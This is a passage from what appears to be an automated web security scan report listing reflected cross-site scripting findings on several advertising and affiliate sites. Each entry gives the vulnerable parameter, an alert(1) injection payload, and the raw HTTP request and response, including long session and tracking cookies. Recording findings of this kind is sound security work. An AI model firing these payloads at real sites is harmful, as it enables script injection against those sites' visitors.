Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 58
X-Varnish: 579499431
Vary: Accept-Encoding
Cache-Control: max-age=5
Date: Tue, 22 Mar 2011 22:05:43 GMT
Connection: close

bad format : jsonfa94c<script>alert(1)</script>c7216a771a6

1.215. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8172'%3balert(1)//8e55f5a4205 was submitted in the admeld_callback parameter. This input was echoed as f8172';alert(1)//8e55f5a4205 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /admeld_sync?admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf8172'%3balert(1)//8e55f5a4205 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=002d9af2-d1e0-46f3-a4d5-a4e3b437adec; partnerUID=eyIxOTkiOiBbIkE5NkM3OEUwNDA1NzQ0Qzc4MDYyMTNENTczNTFBMTA0IiwgdHJ1ZV0sICI3OSI6IFsiNGRlMzBhNTAwYzhjNmI4YmY5Y2JhNzU5OTUwNWI1MjkiLCB0cnVlXSwgIjg0IjogWyJkcHZIRUh6OTk5ZWZJUG9CIiwgdHJ1ZV19; exchange_uid=eyIyIjogWyI0NDcwNDU1NTczMjUzOTA1MzQwIiwgNzM0MjE1XSwgIjQiOiBbIkNBRVNFUG9xYnJjUXIxTjBuR1NrM2x0SlNOOCIsIDczNDE4OF19; segments_p1="eJzjYuY4msPFzLFYCUjM8eNi4Vi7jRHIfCwFZD7vBzH/hQOZvceZgMwNVkDmodWMQPLTNiYg+eIASEWbKZA4ycHFxMHBxcXxYAqzQNPBbW9ZgIK3vUGK2kCKGiOAxDmQXadzgIKPJ4BMebwWZMqCySD2wU0gdh/YounGQIPuAQ1aPmUP2KATID2rJjADhf/2MQuc/7QAYn4lUODDFiaB99fnv2EBKpmxHWTIy4MgAxvfguzdyMHFyXGuSmD142awltl+QOK/D8hjHEBFG8Ea7nWCTP64jUng37TLYINa9zICAMRBTrs="; subID="{}"; impressions="{\"482972\": [1299945155+ \"6ef01ee1-d0cb-3382-9a63-cbfcfe5aab57\"+ 142729+ 86413+ 46]+ \"520622\": [1300725653+ \"TYd_lAADC0AK7FQNrXECjw==\"+ 119539+ 65206+ 1881]+ \"53031\": [1300641748+ \"75748d8d-6597-35f3-881e-7777a5e6e3f4\"+ 44623+ 18287+ 171]+ \"53032\": [1300642147+ \"6f4869ac-89fa-3cf7-8417-2a63c2810131\"+ 44253+ 18150+ 77]+ \"53033\": [1300642204+ \"31737625-e066-390a-9d0e-19cbc315801f\"+ 44620+ 18287+ 171]+ \"430436\": [1298206796+ \"TWEQSwABRq4K5X4e_EJrqQ==\"+ 78868+ 35674+ 1731]}"; camp_freq_p1="eJzjEuHovMEiwCgx9f/cNywGjBZgmkuaY4GHAIvEnM8z3rAosGhcmTQPKMliceU9kM8lwtG6HqTl8Np3r1kUGDQYDBgsGICiz78zA0XPLGhBiAIAQGMe8g=="; io_freq_p1="eJzjEubY6S/AKDH1/9w3LAaMFmCaS5zjoogAi8SczzPesCgwaDAYsFhceQ9kcwlzXPcGqj689t1riASDBQNQ8JIbUPDMghaEIAALAhq0"; dp_rec="{\"2\": 1300725653}"

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 22 Mar 2011 22:03:26 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Tue, 22-Mar-2011 22:03:06 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 569

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchf8172';alert(1)//8e55f5a4205?admeld_adprovider_id=300&external_user_id=002d9af2-d1e0-46f3-a4d5-a4e3b437adec&Expiration=1301263406&custom_user_segments=%2C11265%2C24197%2C6790%2C30337%2C8%2C41869%2C41870%2C15579%2C6551%2C39832%2C1
...[SNIP]...

1.216. http://publisher.mediapass.com/AffiliateID.aspx [Name parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://publisher.mediapass.com
Path:   /AffiliateID.aspx

Issue detail

The value of the Name request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 176f3'%3balert(1)//95d37419c8b was submitted in the Name parameter. This input was echoed as 176f3';alert(1)//95d37419c8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AffiliateID.aspx?Name=AffiliateID176f3'%3balert(1)//95d37419c8b HTTP/1.1
Host: publisher.mediapass.com
Proxy-Connection: keep-alive
Referer: http://publisher.mediapass.com/join.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=152699238.1300485317.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASP.NET_SessionId=hnh5hq55wwkisr45yfmircm3; __utma=152699238.1375779235.1300485317.1300485317.1300907296.2; __utmc=152699238; __utmb=152699238.4.10.1300907296

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 97
Content-Type: application/x-javascript; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="NOI DSP COR NID ADMa OPTa OUR NOR"
X-Powered-By: ASP.NET
Date: Wed, 23 Mar 2011 19:11:40 GMT

document.write('<input type="hidden" name="AffiliateID176f3';alert(1)//95d37419c8b" value="">');

1.217. http://r.turn.com/server/pixel.htm [fpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2946"><script>alert(1)</script>43672c3b592 was submitted in the fpid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=d2946"><script>alert(1)</script>43672c3b592&sp=y&admeld_call_type=iframe&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QYdf8pQ322SIyBI2iUoAU4RjEWhnHVjNlGGMhSRuUKth-L3XcPmT4hHXOQgApIlYHYX4_NcWdx3_ane6F4B-14GhJc02ow2AtUwL6WPia2FGaLnf0zlcY_NlRLgfVWu_p2dXRupylG3NYnZS5bXKYP96WiAgIoOXEFUWrzhKF5gCw-urpRf-_9YebSTVOgNrqPihsYENeO8sXA9lvbRdayfMZtqW06LRo26dh_6mdAGJGTELtL4GqGulFNiuT83_JW8PFWxYJ1q2_24dlRk_ah5icQ-UlIA9kPFGJHuyqaq5VL3rxbStQ7qJq0UYbCEIsUtODQcKNwexAxOYVwN1nK5X96dOre3quYO9Z-8ufvZDTyl_SWg8JF85Vro55plfoTgVQZo2IE3aGhkEGjHTkTFiBYl1Y5wme5TkSr2cG_wgfqVSXeBNVe3tcWgG-cKlb6X9zJjlpwSm9YUJH9a4gJTCk-tuxUia_8m_xGP0ng-vamqLuW_YXqfv_SJ_aE8WewT_9aYmy1_kglD2-j2O9xEN2WSuwULQaF3F5bjuxzhmEuJsfxP5f1y2CMVwcPBKjitRrpYhjNWTpkhfFGNz1pMs9g0Q0vhgJiFRvR8WD6y1byxKhk0zupa7mhXtOt59TSvsYEqhZ0OHSuNp70BrBPgFZPUXsLmq7zd2bgatqFEtgpfxqN_T7QEW7hJnuqjPvjaUahkeh2AIOXYNj81E2z9CvciRuIEJCv8yxQ13OGBfB4P3wQx6U2WiVVEP-_Y7EOaV0vIfQZsAGrAD9lknuVDiL3nhapvU0GeEL2HT-L8OVgkB2bwToPK0KdNC16-jTfAO5O3oP_bfifepQZJrTx5icQ-UlIA9kPFGJHuyqarB6alCNElibRNjAQJxQ3wScEcZhGdHz3dGIuUYDCisolLji3VTL1tjXfqm-esg2sewf4n0X2poBn_JF16R7_JpoTgVQZo2IE3aGhkEGjHTkeeFQfumNuZsM8qSWC1YO88e0aAoBCNnU0MrQhAnhIPCOUygdo-nXLnZpGMXrI7zLHABVz72fi9fhT0whWU6oVuvamqLuW_YXqfv_SJ_aE8WghrAn-Vi2vPEwMGFNlZbYxEN2WSuwULQaF3F5bjuxzh7HBG162ww7piqD1aguph5yjHL13DurDt14-jGkVE335Ms9g0Q0vhgJiFRvR8WD6ypA0SKEqBppDDJhLx8qKy9TSvsYEqhZ0OHSuNp70BrBFPAk0ENEI9AkFKrpbmzGs3jQ_DNJLeHeL0m2Znba1buvjaUahkeh2AIOXYNj81E2-JjZ5NuKJfCva75n_nDp_hfB4P3wQx6U2WiVVEP-_Y7anyk5GyGEYfAPBsxHQjGZSlxmSbeaAgfibEHTq6nsWGJGTELtL4GqGulFNiuT83_aWjrAVXVlG7OWMAFleaNmJbd5mJVeqDBeYockQCeOAxxDWE5tfMM7qZbrjn2eVJNHmJxD5SUgD2Q8UYke7KpqkQLRuw_4qwIZ0RgbwcKb_zPkrK-DNPDU2d6IfOlnKh298JoqNIrcIOFh27SKktj64bitenuXABFvYGLN_FjpjihOBVBmjYgTdoaGQQaMdORRSUpCyAfviw4AHYe3ZFe1j_H39CNFZoidFAH_Wwsr2KYkmu9Efz59RTTwRXe0-z-VzZOXR8fEEZYabQJ5OvIrK9qaou5b9hep-_9In9oTxYDFxyCqW2pHLJpyn6DipzREQ3ZZK7BQtBoXcXluO7HOHYn_JVSl2TRope3S5e7WdCOJuOFdBL4jJzlrGgOb4HBkyz2DRDS-GAmIVG9HxYPrCWrE7nz-KJuRo7xf7_4TaxNK-xgSqFnQ4dK42nvQGsE6ABEyeT6GgYO9T7bPr2uOIHF81yXCYglNgztjlxXYaK-NpRqGR6HYAg5dg2PzUTbalw8lqs5Yl_9jBwMs9Tj-V8Hg_fBDHpTZaJVUQ_79jtEExTCNts46MM726dOHk03EHP-IMF08vrzIT3Bb7Svo5bd5mJVeqDBeYockQCeOAxOo3HTnz6UEXwFhetL-lkMHmJxD5SUgD2Q8UYke7KpqjCzTD1GHFKXcyzidRcl9QVgKfB9VVbr4TUFv2p7bOInOewUt5gP_VlI1Ump9cof8bgUMqrglLkQZ2MmUdI_wRihOBVBmjYgTdoaGQQaMdORXsA1mfR2ULXMKrWuUdGM7RySCcjLsN_cxeO5d6Ll7ah1ym-8DGu-cUq_NzKN12epXgVQXjOJNmBQaMF-8bSNxK9qaou5b9hep-_9In9oTxbS-ghZdhmAasmF69aaImA6EQ3ZZK7BQtBoXcXluO7HOMQfuZ4AWvTJ-mwSNztcWshzAqXI_s6r0eNAoWe_e9VLkyz2DRDS-GAmIVG9HxYPrH5VjA_u5FxGvMqUnf9TQBxNK-xgSqFnQ4dK42nvQGsEmI9YI0NszyrnjSHCBrHOF7N0yDfDXTWmk3YZuned4J1zHpbFxYCHf8ECnS552zQGcx6WxcWAh3_BAp0ueds0BnMelsXFgId_wQKdLnnbNAZzHpbFxYCHf8ECnS552zQGcx6WxcWAh3_BAp0ueds0BitnssvNEea-CDLDeF-fwACvWXqvkkof0pdy12XNR71Ur1l6r5JKH9KXctdlzUe9VK9Zeq-SSh_Sl3LXZc1HvVSvWXqvkkof0pdy12XNR71UF-e0dAu4qNmsK2oR2A9RUQVMCl8aLbGecDd_fKt7NywFTApfGi2xnnA3f3yrezcsBUwKXxotsZ5wN398q3s3LAYbc69DjOHmwnxze8q4bqJPPYJ8usI-1hBBRr5uFxgFqfvBa32ACLSnDYXKF1oBeqn7wWt9gAi0pw2FyhdaAXqp-8FrfYAItKcNhcoXWgF6qfvBa32ACLSnDYXKF1oBeqn7wWt9gAi0pw2FyhdaAXryDt3w8cVNrM49PHXxiClIeDq2PHxBb0G93bZOUEV_B3g6tjx8QW9Bvd22TlBFfwd4OrY8fEFvQb3dtk5QRX8HeDq2PHxBb0G93bZOUEV_B34IJwkHmIrESNkEHZ8g1949RfOkpegw2OWd5Gq1X3SAPUXzpKXoMNjlneRqtV90gD1F86Sl6DDY5Z3karVfdIDVzbApqLD2dXriygnNopblFch-eoCuDk8x64052zPt2RXIfnqArg5PMeuNOdsz7dkVyH56gK4OTzHrjTnbM-3ZFch-eoCuDk8x64052zPt2RXIfnqArg5PMeuNOdsz7dkVyH56gK4OTzHrjTnbM-3ZE1zi3eUCecg106GXWo6ZhRNc4t3lAnnINdOhl1qOmYUTXOLd5QJ5yDXToZdajpmFE1zi3eUCecg106GXWo6ZhfPSjW7H5Jkol9-9LsOFip_z0o1ux-SZKJffvS7DhYqf89KNbsfkmSiX370uw4WKn5tSaxPmfiTgjAFYfvIlraaZa6cUR-KH2UMf-39oRIqSmWunFEfih9lDH_t_aESKkiaPGMMoWG79KMJG1_6B63rd33erOmBTEWjk8EHWq8r_3d93qzpgUxFo5PBB1qvK_33J5TXdC2nyuG8O3c9hqKb9UW1UfXUu5_t-s3mYQevC2GfmtRhuVY6zT1uCqUTs7wcwsdHQlOWV3VIdjcK2T9k; fc=k01_H3DQgin2gUWbqEfHVnEgVJOySuH7g303wn-3ThPBhSQ9y8oNWj2jHjllm2qL9SGC6KvWqijMODBe-PTw-vVibMqUG0iKKCPAs_vD_eA0A7iP8ARnu5R4osC1ayLKRfOX1MD02-o6SZ1b0c_HcdJnnDxsS-ubYBpridlzat8; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004%7C1005%7C12; rds=15054%7C15054%7C15054%7C15050%7Cundefined%7C15054%7C15054%7C15038%7C15054%7C15054%7C15054%7C15054%7Cundefined%7C15054%7C15050%7C15054; rv=1; pf=-jffvaaiYNPx61jB-getKKGyms2bzJ5NxJrHe2QHhR8CR6WdDKKuu1EG8_j0F9lfc-tfcqM5Jblcq-6eY583YF0Qxz0OvdT9GuJ7ViZ2YskPgkp2ShdDLnWVrYTrzrIfKDw8kdmwKgOeuifwfRXx2WIgKeliYqxPi2PuzFXXoEo-VuFfahHlgzh_QOs4p8bLZ2yzZnoMqlwp6K58itScC065x0FBCOqeNn5g6wtVvehK3A4I4wtIxPEx2nGfQAG9-vjZrSxhsgJSHWZlu-7Y8lLwHgaXnw1ge6GUoKaB63xdWz9GlTG1fD_ft3p4jB3znlsrDh8fqPATUgh_nFYrQkkmhbbfarzPZdSY8CyibyS7aDCXeV44OfVe9tEHSeUyDESfPnIeWIxfvM0y6r885gJOIocbmkc1C_88Fb9Lp0WkGr2pIJBbUJJxUowTPiGOvjVZlqhHi0TVaBtC-Ytynv5YO9Q0BRsH9i5yvt_pOdNope6-8bcU90Ecut78VcD3VCzgLVZar6mYj-saVcNK8bDe5HX-E1kIk4gMJUB1k1DJNiwErcR6V9-gMPdB133k3Gz1tfgKNZNU9_cW3FNJIvuoVf7YEa8qj1M0riyKsJMP889UjeORWgIr-IDHwwHe4aa1Pvsy5XpmxG2agnko3_pS6GAtAeZmbNLw3yp4AS1KB2Mkrz2y_-jzio6UgOMjGLgCypEar4RaFruO7KXpg7i87Up8F4Q_b2SCEfNkBVcVdzVlCffFCe9fh2T0OxlJf6yjX4dXAVH9x2WubCsF5Yfka217NmVFFyPB1XAcDp9sC5SExI0LW2uUE1ZEj_0G1W2BjDEY10nhggrTZVpS5CkyEIqZbkE5N4BDovA0bs0vLR8diqAiO12sv249SEi9T8YYfDFrAVtFne37-S8b6b8_zrRSm0Pn_iwZp5Njl1Ctpg-Y8MZ4iEuMM8h57h7sA40WqZv-4bpri7csL2Eha5MQmjlPbOzOgtl-6l2XpIhjxu24jEU-jOAKLeLr8pheLZ-qYOggCRZRzxBfMYedtI1f77e2n42rcO7SrM0VQPxYEPmgvy-5sxMT-JXr-g2mztPqvTmnqVETUDUDPzbGpX7rA2wO8p2W1d8jJh9Wgn5fQv_uySNMh5ni7dKMT_qlR38hdCL1cJUSjCa6-qS_S-29zjxGrVJzGjilqbfEkblssZ3oY8EBiTaXzLFtyqqBeor7c8lwYqgvOkdv7T9_7l0B_Epu2spdJD4h6srOYOyvPs-cbWt3Zsh03akXwoACfppvlMTRqhvXWsl2fX0MhUevEGq1iNRzaKvd2XK6i1aN_2f2T_joajRqNC2KFBlwaF-qXHEx7n0l8K5AqGkS2zWZAZsF6nB55Y-VWuh8k6sEdq2OLdTG1Gbl2PHH_MoRk6zbQBZT5wF4bk7NkJmustC7KfRHZkja4jwEjLaHhlg7ZUy9vbeaGjpbb28szQXKPl5sWT_iHlCQFplL5g_xAwZZxozQ-vwjBbTKEOR4EClMFKBR7NeyYw5CdFipM4nWYHDpnm_yCk_BXR62GHnDChO7-X0Yxrune2xG-PTuWOxbQ3iHJMqt1A83xKmmTpf1YhIPQubDCvHxB0Aj59dKNWd1PyhyVvb3_Imo3z4jO4Q_3rN-08zinn8vOajT3qjsF6G3eK8GfPeHCjDxdpQTpQ; uid=8392341830659049202

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://ad.turn.com/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8392341830659049202; Domain=.turn.com; Expires=Sun, 18-Sep-2011 22:03:40 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 22 Mar 2011 22:03:40 GMT
Content-Length: 377

<html>
<head>
</head>
<body>
<iframe name="turn_sync_frame" width="0" height="0" frameborder="0"
   src="http://cdn.turn.com/server/ddc.htm?uid=8392341830659049202&rnd=3925093810491620252&fpid=d2946"><script>alert(1)</script>43672c3b592&nu=n&t=&sp=y&purl="
   marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true"
   scrolling="no">
...[SNIP]...

1.218. http://r.turn.com/server/pixel.htm [sp parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /server/pixel.htm

Issue detail

The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34084"><script>alert(1)</script>890b9545dd4 was submitted in the sp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /server/pixel.htm?fpid=4&sp=34084"><script>alert(1)</script>890b9545dd4&admeld_call_type=iframe&admeld_user_id=63e2c778-f3e1-4d02-8ee2-261dfa64843d&admeld_adprovider_id=24&admeld_call_type=iframe&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=QYdf8pQ322SIyBI2iUoAU4RjEWhnHVjNlGGMhSRuUKth-L3XcPmT4hHXOQgApIlYHYX4_NcWdx3_ane6F4B-14GhJc02ow2AtUwL6WPia2FGaLnf0zlcY_NlRLgfVWu_p2dXRupylG3NYnZS5bXKYP96WiAgIoOXEFUWrzhKF5gCw-urpRf-_9YebSTVOgNrqPihsYENeO8sXA9lvbRdayfMZtqW06LRo26dh_6mdAGJGTELtL4GqGulFNiuT83_JW8PFWxYJ1q2_24dlRk_ah5icQ-UlIA9kPFGJHuyqaq5VL3rxbStQ7qJq0UYbCEIsUtODQcKNwexAxOYVwN1nK5X96dOre3quYO9Z-8ufvZDTyl_SWg8JF85Vro55plfoTgVQZo2IE3aGhkEGjHTkTFiBYl1Y5wme5TkSr2cG_wgfqVSXeBNVe3tcWgG-cKlb6X9zJjlpwSm9YUJH9a4gJTCk-tuxUia_8m_xGP0ng-vamqLuW_YXqfv_SJ_aE8WewT_9aYmy1_kglD2-j2O9xEN2WSuwULQaF3F5bjuxzhmEuJsfxP5f1y2CMVwcPBKjitRrpYhjNWTpkhfFGNz1pMs9g0Q0vhgJiFRvR8WD6y1byxKhk0zupa7mhXtOt59TSvsYEqhZ0OHSuNp70BrBPgFZPUXsLmq7zd2bgatqFEtgpfxqN_T7QEW7hJnuqjPvjaUahkeh2AIOXYNj81E2z9CvciRuIEJCv8yxQ13OGBfB4P3wQx6U2WiVVEP-_Y7EOaV0vIfQZsAGrAD9lknuVDiL3nhapvU0GeEL2HT-L8OVgkB2bwToPK0KdNC16-jTfAO5O3oP_bfifepQZJrTx5icQ-UlIA9kPFGJHuyqarB6alCNElibRNjAQJxQ3wScEcZhGdHz3dGIuUYDCisolLji3VTL1tjXfqm-esg2sewf4n0X2poBn_JF16R7_JpoTgVQZo2IE3aGhkEGjHTkeeFQfumNuZsM8qSWC1YO88e0aAoBCNnU0MrQhAnhIPCOUygdo-nXLnZpGMXrI7zLHABVz72fi9fhT0whWU6oVuvamqLuW_YXqfv_SJ_aE8WghrAn-Vi2vPEwMGFNlZbYxEN2WSuwULQaF3F5bjuxzh7HBG162ww7piqD1aguph5yjHL13DurDt14-jGkVE335Ms9g0Q0vhgJiFRvR8WD6ypA0SKEqBppDDJhLx8qKy9TSvsYEqhZ0OHSuNp70BrBFPAk0ENEI9AkFKrpbmzGs3jQ_DNJLeHeL0m2Znba1buvjaUahkeh2AIOXYNj81E2-JjZ5NuKJfCva75n_nDp_hfB4P3wQx6U2WiVVEP-_Y7anyk5GyGEYfAPBsxHQjGZSlxmSbeaAgfibEHTq6nsWGJGTELtL4GqGulFNiuT83_aWjrAVXVlG7OWMAFleaNmJbd5mJVeqDBeYockQCeOAxxDWE5tfMM7qZbrjn2eVJNHmJxD5SUgD2Q8UYke7KpqkQLRuw_4qwIZ0RgbwcKb_zPkrK-DNPDU2d6IfOlnKh298JoqNIrcIOFh27SKktj64bitenuXABFvYGLN_FjpjihOBVBmjYgTdoaGQQaMdORRSUpCyAfviw4AHYe3ZFe1j_H39CNFZoidFAH_Wwsr2KYkmu9Efz59RTTwRXe0-z-VzZOXR8fEEZYabQJ5OvIrK9qaou5b9hep-_9In9oTxYDFxyCqW2pHLJpyn6DipzREQ3ZZK7BQtBoXcXluO7HOHYn_JVSl2TRope3S5e7WdCOJuOFdBL4jJzlrGgOb4HBkyz2DRDS-GAmIVG9HxYPrCWrE7nz-KJuRo7xf7_4TaxNK-xgSqFnQ4dK42nvQGsE6ABEyeT6GgYO9T7bPr2uOIHF81yXCYglNgztjlxXYaK-NpRqGR6HYAg5dg2PzUTbalw8lqs5Yl_9jBwMs9Tj-V8Hg_fBDHpTZaJVUQ_79jtEExTCNts46MM726dOHk03EHP-IMF08vrzIT3Bb7Svo5bd5mJVeqDBeYockQCeOAxOo3HTnz6UEXwFhetL-lkMHmJxD5SUgD2Q8UYke7KpqjCzTD1GHFKXcyzidRcl9QVgKfB9VVbr4TUFv2p7bOInOewUt5gP_VlI1Ump9cof8bgUMqrglLkQZ2MmUdI_wRihOBVBmjYgTdoaGQQaMdORXsA1mfR2ULXMKrWuUdGM7RySCcjLsN_cxeO5d6Ll7ah1ym-8DGu-cUq_NzKN12epXgVQXjOJNmBQaMF-8bSNxK9qaou5b9hep-_9In9oTxbS-ghZdhmAasmF69aaImA6EQ3ZZK7BQtBoXcXluO7HOMQfuZ4AWvTJ-mwSNztcWshzAqXI_s6r0eNAoWe_e9VLkyz2DRDS-GAmIVG9HxYPrH5VjA_u5FxGvMqUnf9TQBxNK-xgSqFnQ4dK42nvQGsEmI9YI0NszyrnjSHCBrHOF7N0yDfDXTWmk3YZuned4J1zHpbFxYCHf8ECnS552zQGcx6WxcWAh3_BAp0ueds0BnMelsXFgId_wQKdLnnbNAZzHpbFxYCHf8ECnS552zQGcx6WxcWAh3_BAp0ueds0BitnssvNEea-CDLDeF-fwACvWXqvkkof0pdy12XNR71Ur1l6r5JKH9KXctdlzUe9VK9Zeq-SSh_Sl3LXZc1HvVSvWXqvkkof0pdy12XNR71UF-e0dAu4qNmsK2oR2A9RUQVMCl8aLbGecDd_fKt7NywFTApfGi2xnnA3f3yrezcsBUwKXxotsZ5wN398q3s3LAYbc69DjOHmwnxze8q4bqJPPYJ8usI-1hBBRr5uFxgFqfvBa32ACLSnDYXKF1oBeqn7wWt9gAi0pw2FyhdaAXqp-8FrfYAItKcNhcoXWgF6qfvBa32ACLSnDYXKF1oBeqn7wWt9gAi0pw2FyhdaAXryDt3w8cVNrM49PHXxiClIeDq2PHxBb0G93bZOUEV_B3g6tjx8QW9Bvd22TlBFfwd4OrY8fEFvQb3dtk5QRX8HeDq2PHxBb0G93bZOUEV_B34IJwkHmIrESNkEHZ8g1949RfOkpegw2OWd5Gq1X3SAPUXzpKXoMNjlneRqtV90gD1F86Sl6DDY5Z3karVfdIDVzbApqLD2dXriygnNopblFch-eoCuDk8x64052zPt2RXIfnqArg5PMeuNOdsz7dkVyH56gK4OTzHrjTnbM-3ZFch-eoCuDk8x64052zPt2RXIfnqArg5PMeuNOdsz7dkVyH56gK4OTzHrjTnbM-3ZE1zi3eUCecg106GXWo6ZhRNc4t3lAnnINdOhl1qOmYUTXOLd5QJ5yDXToZdajpmFE1zi3eUCecg106GXWo6ZhfPSjW7H5Jkol9-9LsOFip_z0o1ux-SZKJffvS7DhYqf89KNbsfkmSiX370uw4WKn5tSaxPmfiTgjAFYfvIlraaZa6cUR-KH2UMf-39oRIqSmWunFEfih9lDH_t_aESKkiaPGMMoWG79KMJG1_6B63rd33erOmBTEWjk8EHWq8r_3d93qzpgUxFo5PBB1qvK_33J5TXdC2nyuG8O3c9hqKb9UW1UfXUu5_t-s3mYQevC2GfmtRhuVY6zT1uCqUTs7wcwsdHQlOWV3VIdjcK2T9k; fc=k01_H3DQgin2gUWbqEfHVnEgVJOySuH7g303wn-3ThPBhSQ9y8oNWj2jHjllm2qL9SGC6KvWqijMODBe-PTw-vVibMqUG0iKKCPAs_vD_eA0A7iP8ARnu5R4osC1ayLKRfOX1MD02-o6SZ1b0c_HcdJnnDxsS-ubYBpridlzat8; rrs=1%7C2%7C3%7C4%7Cundefined%7C6%7C7%7C8%7C9%7C1001%7C1002%7C1003%7Cundefined%7C1004%7C1005%7C12; rds=15054%7C15054%7C15054%7C15050%7Cundefined%7C15054%7C15054%7C15038%7C15054%7C15054%7C15054%7C15054%7Cundefined%7C15054%7C15050%7C15054; rv=1; pf=-jffvaaiYNPx61jB-getKKGyms2bzJ5NxJrHe2QHhR8CR6WdDKKuu1EG8_j0F9lfc-tfcqM5Jblcq-6eY583YF0Qxz0OvdT9GuJ7ViZ2YskPgkp2ShdDLnWVrYTrzrIfKDw8kdmwKgOeuifwfRXx2WIgKeliYqxPi2PuzFXXoEo-VuFfahHlgzh_QOs4p8bLZ2yzZnoMqlwp6K58itScC065x0FBCOqeNn5g6wtVvehK3A4I4wtIxPEx2nGfQAG9-vjZrSxhsgJSHWZlu-7Y8lLwHgaXnw1ge6GUoKaB63xdWz9GlTG1fD_ft3p4jB3znlsrDh8fqPATUgh_nFYrQkkmhbbfarzPZdSY8CyibyS7aDCXeV44OfVe9tEHSeUyDESfPnIeWIxfvM0y6r885gJOIocbmkc1C_88Fb9Lp0WkGr2pIJBbUJJxUowTPiGOvjVZlqhHi0TVaBtC-Ytynv5YO9Q0BRsH9i5yvt_pOdNope6-8bcU90Ecut78VcD3VCzgLVZar6mYj-saVcNK8bDe5HX-E1kIk4gMJUB1k1DJNiwErcR6V9-gMPdB133k3Gz1tfgKNZNU9_cW3FNJIvuoVf7YEa8qj1M0riyKsJMP889UjeORWgIr-IDHwwHe4aa1Pvsy5XpmxG2agnko3_pS6GAtAeZmbNLw3yp4AS1KB2Mkrz2y_-jzio6UgOMjGLgCypEar4RaFruO7KXpg7i87Up8F4Q_b2SCEfNkBVcVdzVlCffFCe9fh2T0OxlJf6yjX4dXAVH9x2WubCsF5Yfka217NmVFFyPB1XAcDp9sC5SExI0LW2uUE1ZEj_0G1W2BjDEY10nhggrTZVp